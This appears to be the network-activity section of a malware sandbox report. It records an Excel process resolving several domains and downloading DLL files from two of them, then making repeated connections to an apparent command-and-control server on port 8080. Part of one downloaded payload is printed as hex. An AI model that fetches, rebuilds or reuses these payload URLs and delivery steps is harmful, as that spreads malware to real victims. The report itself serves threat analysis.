                                                                  May 23, 2022 09:56:45.931474924 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:45.931509018 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:45.931519985 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:45.931550026 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:45.931555986 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:45.931588888 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:45.931596041 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:45.931628942 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:45.931636095 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:45.931668997 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:45.931674004 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:45.931706905 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:45.931714058 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:45.931746960 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:45.931754112 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:45.931786060 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:45.931792021 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:45.931826115 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:45.931833029 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:45.931873083 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.028171062 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.094319105 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.094403028 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.094464064 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.094558001 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.094567060 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.094597101 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.094615936 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.094623089 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.094672918 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.094676018 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.094722986 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.094728947 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.094777107 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.094782114 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.094829082 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.095918894 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.095993996 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.096049070 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.096084118 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.096102953 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.096102953 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.096149921 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.096159935 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.096206903 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.096210957 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.096256018 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.096262932 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.096309900 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.096318960 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.096364975 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.096369982 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.096415043 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.096424103 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.096470118 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.096504927 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.096564054 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.096580982 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.096626043 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:56:46.096628904 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:46.096672058 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:56:49.078124046 CEST4917680192.168.2.22211.149.139.157
                                                                  May 23, 2022 09:56:52.085390091 CEST4917680192.168.2.22211.149.139.157
                                                                  May 23, 2022 09:56:58.091864109 CEST4917680192.168.2.22211.149.139.157
                                                                  May 23, 2022 09:57:05.800242901 CEST491778080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:05.975467920 CEST808049177173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:05.975682974 CEST491778080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:06.058633089 CEST491778080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:06.232053041 CEST808049177173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:06.248497009 CEST808049177173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:06.248559952 CEST808049177173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:06.248745918 CEST491778080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:06.264146090 CEST491778080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:06.437519073 CEST808049177173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:06.439948082 CEST808049177173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:06.440082073 CEST491778080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:09.364887953 CEST491778080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:09.538222075 CEST808049177173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:10.208667040 CEST808049177173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:10.208790064 CEST491778080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:13.206214905 CEST808049177173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:13.206239939 CEST808049177173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:13.206336021 CEST491778080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:14.000063896 CEST491798080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:14.173234940 CEST808049179173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:14.173352003 CEST491798080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:14.263492107 CEST491798080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:14.436650991 CEST808049179173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:14.457349062 CEST808049179173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:14.457376003 CEST808049179173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:14.460335970 CEST491798080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:14.471106052 CEST491798080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:14.644354105 CEST808049179173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:14.647444963 CEST808049179173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:14.647620916 CEST491798080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:15.250518084 CEST491808080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:15.423757076 CEST808049180173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:15.423855066 CEST491808080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:15.547374964 CEST491808080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:15.560808897 CEST491798080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:15.720787048 CEST808049180173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:15.734016895 CEST808049179173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:15.737400055 CEST808049180173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:15.737421036 CEST808049180173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:15.737484932 CEST491808080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:15.737535000 CEST491808080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:15.744992018 CEST491808080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:15.918170929 CEST808049180173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:15.920768023 CEST808049180173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:15.920856953 CEST491808080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:16.402462959 CEST808049179173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:16.402781963 CEST491798080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:16.838538885 CEST491808080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:17.011838913 CEST808049180173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:17.694988012 CEST808049180173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:17.695108891 CEST491808080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:19.406373024 CEST808049179173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:19.406409025 CEST808049179173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:19.406630039 CEST491798080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:57:20.695226908 CEST808049180173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:20.695255995 CEST808049180173.82.82.196192.168.2.22
                                                                  May 23, 2022 09:57:20.695313931 CEST491808080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:58:37.551120996 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:58:37.551250935 CEST4917480192.168.2.22185.86.13.242
                                                                  May 23, 2022 09:58:37.715776920 CEST8049175103.133.214.149192.168.2.22
                                                                  May 23, 2022 09:58:37.715993881 CEST4917580192.168.2.22103.133.214.149
                                                                  May 23, 2022 09:58:37.846968889 CEST4917480192.168.2.22185.86.13.242
                                                                  May 23, 2022 09:58:38.455564976 CEST4917480192.168.2.22185.86.13.242
                                                                  May 23, 2022 09:58:39.687916040 CEST4917480192.168.2.22185.86.13.242
                                                                  May 23, 2022 09:58:42.090584040 CEST4917480192.168.2.22185.86.13.242
                                                                  May 23, 2022 09:58:46.895833969 CEST4917480192.168.2.22185.86.13.242
                                                                  May 23, 2022 09:58:55.603497028 CEST491778080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:58:55.606291056 CEST491778080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:58:56.506244898 CEST4917480192.168.2.22185.86.13.242
                                                                  May 23, 2022 09:59:03.646367073 CEST491798080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:59:03.646891117 CEST491798080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:59:04.963619947 CEST491808080192.168.2.22173.82.82.196
                                                                  May 23, 2022 09:59:04.963674068 CEST491808080192.168.2.22173.82.82.196
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 23, 2022 09:56:37.647711039 CEST5586853192.168.2.228.8.8.8
                                                                  May 23, 2022 09:56:37.680419922 CEST53558688.8.8.8192.168.2.22
                                                                  May 23, 2022 09:56:41.423423052 CEST4968853192.168.2.228.8.8.8
                                                                  May 23, 2022 09:56:41.493875980 CEST53496888.8.8.8192.168.2.22
                                                                  May 23, 2022 09:56:44.159074068 CEST5883653192.168.2.228.8.8.8
                                                                  May 23, 2022 09:56:44.551866055 CEST53588368.8.8.8192.168.2.22
                                                                  May 23, 2022 09:56:49.057354927 CEST5013453192.168.2.228.8.8.8
                                                                  May 23, 2022 09:56:49.076469898 CEST53501348.8.8.8192.168.2.22
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  May 23, 2022 09:56:37.647711039 CEST192.168.2.228.8.8.80xc59bStandard query (0)microlent.comA (IP address)IN (0x0001)
                                                                  May 23, 2022 09:56:41.423423052 CEST192.168.2.228.8.8.80x76daStandard query (0)kuluckaci.comA (IP address)IN (0x0001)
                                                                  May 23, 2022 09:56:44.159074068 CEST192.168.2.228.8.8.80x42b9Standard query (0)mcapublicschool.comA (IP address)IN (0x0001)
                                                                  May 23, 2022 09:56:49.057354927 CEST192.168.2.228.8.8.80xefcaStandard query (0)moorworld.comA (IP address)IN (0x0001)
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  May 23, 2022 09:56:37.680419922 CEST8.8.8.8192.168.2.220xc59bNo error (0)microlent.com103.195.4.8A (IP address)IN (0x0001)
                                                                  May 23, 2022 09:56:41.493875980 CEST8.8.8.8192.168.2.220x76daNo error (0)kuluckaci.com185.86.13.242A (IP address)IN (0x0001)
                                                                  May 23, 2022 09:56:44.551866055 CEST8.8.8.8192.168.2.220x42b9No error (0)mcapublicschool.com103.133.214.149A (IP address)IN (0x0001)
                                                                  May 23, 2022 09:56:49.076469898 CEST8.8.8.8192.168.2.220xefcaNo error (0)moorworld.com211.149.139.157A (IP address)IN (0x0001)
                                                                  • microlent.com
                                                                  • kuluckaci.com
                                                                  • mcapublicschool.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.2249173103.195.4.8443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  TimestampkBytes transferredDirectionData


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.2249174185.86.13.24280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 23, 2022 09:56:41.558573008 CEST376OUTGET /yarisma/cgi-bin/aIuI4Ukdtl730sP1F/ HTTP/1.1
                                                                  Accept: */*
                                                                  UA-CPU: AMD64
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                  Host: kuluckaci.com
                                                                  Connection: Keep-Alive
                                                                  May 23, 2022 09:56:41.635432005 CEST378INHTTP/1.1 200 OK
                                                                  Date: Mon, 23 May 2022 07:20:45 GMT
                                                                  Server: Apache/2
                                                                  X-Powered-By: PHP/5.6.40
                                                                  Cache-Control: no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 23 May 2022 07:20:45 GMT
                                                                  Content-Disposition: attachment; filename="xqJfpnc0wEmcroPdpB.dll"
                                                                  Content-Transfer-Encoding: binary
                                                                  Set-Cookie: 628b35cde4fad=1653290445; expires=Mon, 23-May-2022 07:21:45 GMT; Max-Age=60; path=/
                                                                  Last-Modified: Mon, 23 May 2022 07:20:45 GMT
                                                                  Vary: Accept-Encoding,User-Agent
                                                                  Content-Encoding: gzip
                                                                  Keep-Alive: timeout=2, max=100
                                                                  Connection: Keep-Alive
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: application/x-msdownload
                                                                  Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 09 7c 53 c5 f6 00 8e df a4 09 84 d2 92 00 2d 54 d6 00 41 2a 6b 05 d4 22 14 53 68 35 95 02 45 41 ab a2 96 bd 02 6a 81 04 aa 02 52 d3 2a 35 54 ab a2 e2 f6 e4 29 2a ee b8 61 f1 a1 b6 a2 a4 28 2a e2 86 3b ee 37 06 11 57 ea d6 fc cf 32 73 ef cd 4d 8a fa de f7 f7 ff ff 3f ff cf 9f f7 6c ce 9d 7d ce 9c 39 e7 cc cc 99 33 93 cf ae 57 52 14 45 b1 c1 7f b1 98 a2 34 28 fc cf ab fc f5 3f 15 fe eb d4 f7 99 4e ca 93 1d 5e ed d7 60 29 7e b5 df f4 f2 0b 96 b9 2b 96 5e bc 60 e9 ac 0b dd 73 66 5d 74 d1 c5 7e f7 ec 79 ee a5 81 8b dc 17 5c e4 2e 98 7a ba fb c2 8b e7 ce 1b 9e 9e 9e ea 11 65 dc f2 44 fb dc 8f f6 5e b0 48 fe f7 f8 a6 1d 8b 82 f4 7b 78 d1 bb f0 fb d6 03 bf 2d 7a 9f e2 ca 17 55 53 f8 0b 8b 7e a1 df 1f 16 7d 48 bf 3f 8a df 9f e8 f7 b4 0b e6 94 63 39 e6 b6 96 14 2a ca dc 2b db 29 cb 2f bb 6a b6 0c 3b a4 f4 77 77 b4 a6 42 e7 ad 8a 72 75 0a 85 ad 39 0e fe b8 18 b4 28 02 86 68 3b fe 51 f4 5f e5 90 9d 90 f6 f3 f4 76 10 e2 b5 c8 4c f2 27 f1 9b c1 3d 0f 58 95 6a c4 f7 5d 56 a5 84 42 53 94 3f de 80 32 0f 59 95 dd 4e 43 83 f7 db 95 f5 d6 bf 31 08 e6 7f 6e ab b2 e1 08 f9 86 fb e7 55 fa e1 f7 b7 14 2b 37 08 fb 6e 33 15 a1 28 65 c3 97 ce 9d e5 9f a5 28 d3 43 5c a6 b2 0e 7e 1d f1 05 7b e1 ff c3 39 99 b2 e1 04 f8 b3 05 e2 33 e0 77 7d 42 ba c6 e1 15 9c 90 fa 78 48 d4 bd 39 49 79 4b 97 2d 9d 03 30 e1 04 29 73 2f fc 36 24 4b 37 6f f1 c5 90 f0 87 76 0a e1 4a 71 c0 ef d5 76 73 ba 09 6d 63 e2 ff ff 0f ff f9 6a 67 7a 1c be da c5 1e 97 af d6 ef c9 3a d3 17 3c 90 53 14 da e7 0b fd e0 0b 45 62 99 df 3a ad 4a e1 a8 5d c5 a1 97 f2 eb a6 59 42 cd 90 3a 1b 13 ba 63 99 2f 43 d4 a8 46 5f 70 57 cc 17 6a fd e1 11 5f 68 87 ef f0 1b be d8 2e df 90 26 5f b0 c5 ba ac 7d 83 dd ab ac 89 e6 ec b4 1d eb f6 c5 9a 7c 75 e3 8e 1d f2 5e 2c f3 36 ad c4 50 33 94 69 e5 12 57 62 89 15 5c 62 68 a6 c7 eb 0b 2d f6 f8 7c 21 bf a7 c4 17 7c 31 e7 fc 1d bb e5 3f 6a 2f b6 b2 c4 17 b2 9f 79 a7 55 f1 8d 7a d1 57 5b 80 89 b7 7b d6 60 87 42 2f fb 42 ef c7 4e 73 15 d7 15 7b 72 f3 1b 5c 14 b6 c7 57 57 e0 c9 f1 85 5e c1 b4 ee d8 e9 59 35 8d 7e d1 c0 5e c1 95 9e 1c 57 e0 87 e2 50 b5 67 2d 26 c6 7c be d0 bb ea a7
                                                                  Data Ascii: 1faa|S-TA*k"Sh5EAjR*5T)*a(*;7W2sM?l}93WRE4(?N^`)~+^`sf]t~y\.zeD^H{x-zUS~}H?c9*+)/j;wwBru9(h;Q_vL'=Xj]VBS?2YNC1nU+7n3(e(C\~{93w}BxH9IyK-0)s/6$K7ovJqvsmcjgz:<SEb:J]YB:c/CF_pWj_h.&_}|u^,6P3iWb\bh-|!|1?j/yUzW[{`B/BNs{r\WW^Y5~^WPg-&|
                                                                  May 23, 2022 09:56:41.635478973 CEST379INData Raw: ad 31 e8 5a 31 14 3d 6a b7 3a bd 1f 16 33 d3 53 06 ed 29 49 d6 9e 32 68 4f f8 5f 5a 7b 4a b0 3d f5 49 da e3 f8 ab f6 e4 60 7b 1c 81 1f 7c 75 d3 01 0f 98 29 96 79 51 27 ab 02 29 3e c6 36 6e 10 6d f4 62 1b f3 44 1b 4b b0 8d 5b dc dc c6 0a 68 63 99
                                                                  Data Ascii: 1Z1=j:3S)I2hO_Z{J=I`{|u)yQ')>6nmbDK[hch#OhTtb<g!GDZ WA]|Wzq_@!p8~aH+: tVVaI;V=,W|)!i7}F~gQV|O[C3kOp],(l
                                                                  May 23, 2022 09:56:41.635513067 CEST381INData Raw: a0 d1 7b 07 00 0e 8a 01 aa 39 f1 e0 b8 70 4d 09 40 53 26 39 bf 0b d7 4c 07 e8 92 4e 1b fa 85 6b 4a 01 ea 9a 39 62 5e b8 66 26 40 2b 16 8d 50 c3 35 65 00 05 ce b3 65 84 6b e6 02 b4 f3 f9 39 9f 87 6b ca 01 2a 5e 68 01 3c 2f 06 e8 eb 0f ca f2 c2 35
                                                                  Data Ascii: {9pM@S&9LNkJ9b^f&@+P5eek9k*^h</5M>vp5Juof%@SM|4?.8nk@q ?@)w%(lw?~4cCH>TK@_hInY-?\C:J?.
                                                                  May 23, 2022 09:56:41.635549068 CEST382INData Raw: cb 0f 00 d7 b3 01 34 63 c8 c5 20 cf 1d 00 7d ee ec 02 f2 23 0d a0 4f 4b 16 43 6d 2e 80 96 b7 7b ec 71 a0 3f 80 e6 7d fe ba 17 e8 0f a0 a5 0b 56 c0 2c eb 05 90 a7 70 c0 f3 40 7f 00 dd 5f b2 b7 12 e8 0f a0 7e db ee 01 8e 94 0d d0 c4 11 5f ed 07 fa
                                                                  Data Ascii: 4c }#OKCm.{q?}V,p@_~_:s}_O"g4((tbV>fGkA*K8wL6/_n@O(hj^rrj@}@-[$?PN%@<
                                                                  May 23, 2022 09:56:41.635567904 CEST383INData Raw: 80 f9 d6 88 b1 0f 4c db 0d f4 07 50 ed 64 5c 3b 37 03 f4 ed 9f 36 28 6f 37 40 97 5c f0 26 ac a2 f7 00 34 67 f1 a7 37 03 fd 01 d4 db 3a fc 4d a0 3f 80 32 7d 76 e8 db 87 38 6e 3f 1f 07 2b 91 fd 48 11 19 af dd 05 f4 07 d0 80 1f 33 96 01 fd 01 e4 9c
                                                                  Data Ascii: LPd\;76(o7@\&4g7:M?2}v8n?+H3J<=O!Ou=;u?|&=B[6^x*HN@@5y6uP6(@vv4bkl/x(@g9mslXh]4*'~[V
                                                                  May 23, 2022 09:56:41.635586023 CEST385INData Raw: 83 c6 57 5f 07 fa 03 28 b4 e7 1a c0 73 35 40 37 0c f8 10 b8 f2 5a 0c 6b ba 0e 78 e2 3a 2c e5 3c 05 74 a9 7a 80 ee 1b 39 1e 24 fb 7a 8c 9d e7 c7 f5 2f 40 d9 f7 55 c1 da f9 76 84 ac 03 a1 7d 1b 01 3a 08 8b 7b a0 3f ec c7 aa 00 e8 93 9b 01 f2 ff f6
                                                                  Data Ascii: W_(s5@7Zkx:,<tz9$z/@Uv}:{?`!n@%gz}~909q0kDh@3/ifX4w].0w40+u@}hc?zMxp9@;>@%7t>ra?0+~h0-
                                                                  May 23, 2022 09:56:41.635602951 CEST386INData Raw: 98 08 fe 5f 54 f5 ab d2 0b d6 d2 39 98 be 76 1a 60 6e 9a 0b f2 79 e1 77 1f fc b7 1f f2 c3 8f 0a ff 1d 82 ff 5a 02 fb a2 eb a1 c9 05 d0 5e e7 8e ce f0 1f e4 80 3f 9c 05 80 7d f8 87 32 c1 af 8a 7f 0e e1 9f 96 c0 9e 43 6b d2 3c 4a 64 3a 50 9c 81 5e
                                                                  Data Ascii: _T9v`nywZ^?}2Ck<Jd:P^Z52MW`[G5F:w3D@ h2*A]eUg><RW1+3":><A7Ex\Y,* M5o=BYRQV%`7
                                                                  May 23, 2022 09:56:41.635621071 CEST387INData Raw: 31 66 61 30 0d 0a ed 47 55 72 b5 20 16 ec 99 02 ae 88 65 2e 54 01 27 f6 c5 90 83 e7 c9 c2 19 40 ce bb 62 99 a7 42 38 60 e0 15 98 02 b1 cc e3 e0 23 98 77 32 9e df 06 52 39 dd 84 19 38 43 32 20 e2 19 ac 0a b4 9b 58 66 eb d7 16 14 b1 d8 58 4d fe 25
                                                                  Data Ascii: 1fa0GUr e.T'@bB8`#w2R98C2 XfXM%U6S=%T^-aV%ityd4,#DM"RndGZqW\<eI+-.Y]<*HEC3jtT|)._hA-{*JI\
                                                                  May 23, 2022 09:56:41.635639906 CEST389INData Raw: 51 bb f2 1b 2e 47 d6 50 97 f9 1d 30 9f 6d 48 4c ea 71 17 83 70 6f b1 04 52 40 c0 86 ed 9f 57 f3 05 af 68 a7 90 fd 83 6a de 37 78 13 7e 43 f6 5b 16 59 91 d1 96 06 f3 6e 5d 84 d4 95 1e b2 5f 0f 00 6a 4e 01 0b 30 af bc cf e1 0b 78 cf b3 c8 e0 f8 6e
                                                                  Data Ascii: Q.GP0mHLqpoR@Whj7x~C[Yn]_jN0xnrlCjaL#Q{Ex&+;?g?|~2m;3\$C!C.Z6`[LBp^K=|OBbeK/CE{#F"LHdsHyz_8i+
                                                                  May 23, 2022 09:56:41.635658979 CEST390INData Raw: 63 8d b8 a7 4c db eb cd ea d5 9f 92 7a d2 f7 7c 16 f3 5e 3a 9a f1 a5 40 82 97 35 15 66 3e a4 21 44 06 86 8a 0a d7 09 6e c0 4a 56 a9 90 5b 42 c9 2a 45 09 2a 94 a8 52 2e 14 b4 2d 49 30 81 02 0d 12 aa 1d 2e 77 68 22 3c f7 96 71 22 84 78 22 dc f2 a6
                                                                  Data Ascii: cLz|^:@5f>!DnJV[B*E*R.-I0.wh"<q"x"2N=-g{bt4\]U_A:en/Xa9W\uKn[PCwF'.-{em%rR[.-(hxlT(\jT1"]~@Ii{(
                                                                  May 23, 2022 09:56:41.697994947 CEST391INData Raw: 3a fb 1f 82 ff 96 27 6a 3c 0f 4f 63 a9 7e c9 9f 68 d5 e7 ac 79 2e 5e aa cf 31 8b d5 ac da 62 b6 bc 46 7e 4f f4 9a 4c 76 63 55 02 7b 25 af 26 62 ef c0 64 03 ba 4f 89 db 77 6e bb a0 15 bb 13 0b ba 7b 72 dc 30 94 29 5a eb 93 eb 30 cf 97 70 6f 43 7f
                                                                  Data Ascii: :'j<Oc~hy.^1bF~OLvcU{%&bdOwn{r0)Z0poC?$6m=UFogWro{}}|''un\sd>?25D'%;C">jx.W%-WrRgR^c4hjShgf


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.2249175103.133.214.14980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  TimestampkBytes transferredDirectionData
                                                                  May 23, 2022 09:56:44.727391005 CEST633OUTGET /Achievements/r4psv/ HTTP/1.1
                                                                  Accept: */*
                                                                  UA-CPU: AMD64
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                  Host: mcapublicschool.com
                                                                  Connection: Keep-Alive
                                                                  May 23, 2022 09:56:44.910235882 CEST634INHTTP/1.1 200 OK
                                                                  Cache-Control: no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  Content-Type: application/x-msdownload
                                                                  Expires: Mon, 23 May 2022 07:56:43 GMT
                                                                  Last-Modified: Mon, 23 May 2022 07:56:43 GMT
                                                                  Server: Microsoft-IIS/8.5
                                                                  Set-Cookie: 628b3e3b9c6d7=1653292603; expires=Mon, 23-May-2022 07:57:43 GMT; path=/
                                                                  Content-Disposition: attachment; filename="f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL.dll"
                                                                  Content-Transfer-Encoding: binary
                                                                  X-Powered-By: ASP.NET
                                                                  X-Powered-By-Plesk: PleskWin
                                                                  Date: Mon, 23 May 2022 07:56:43 GMT
                                                                  Content-Length: 365056
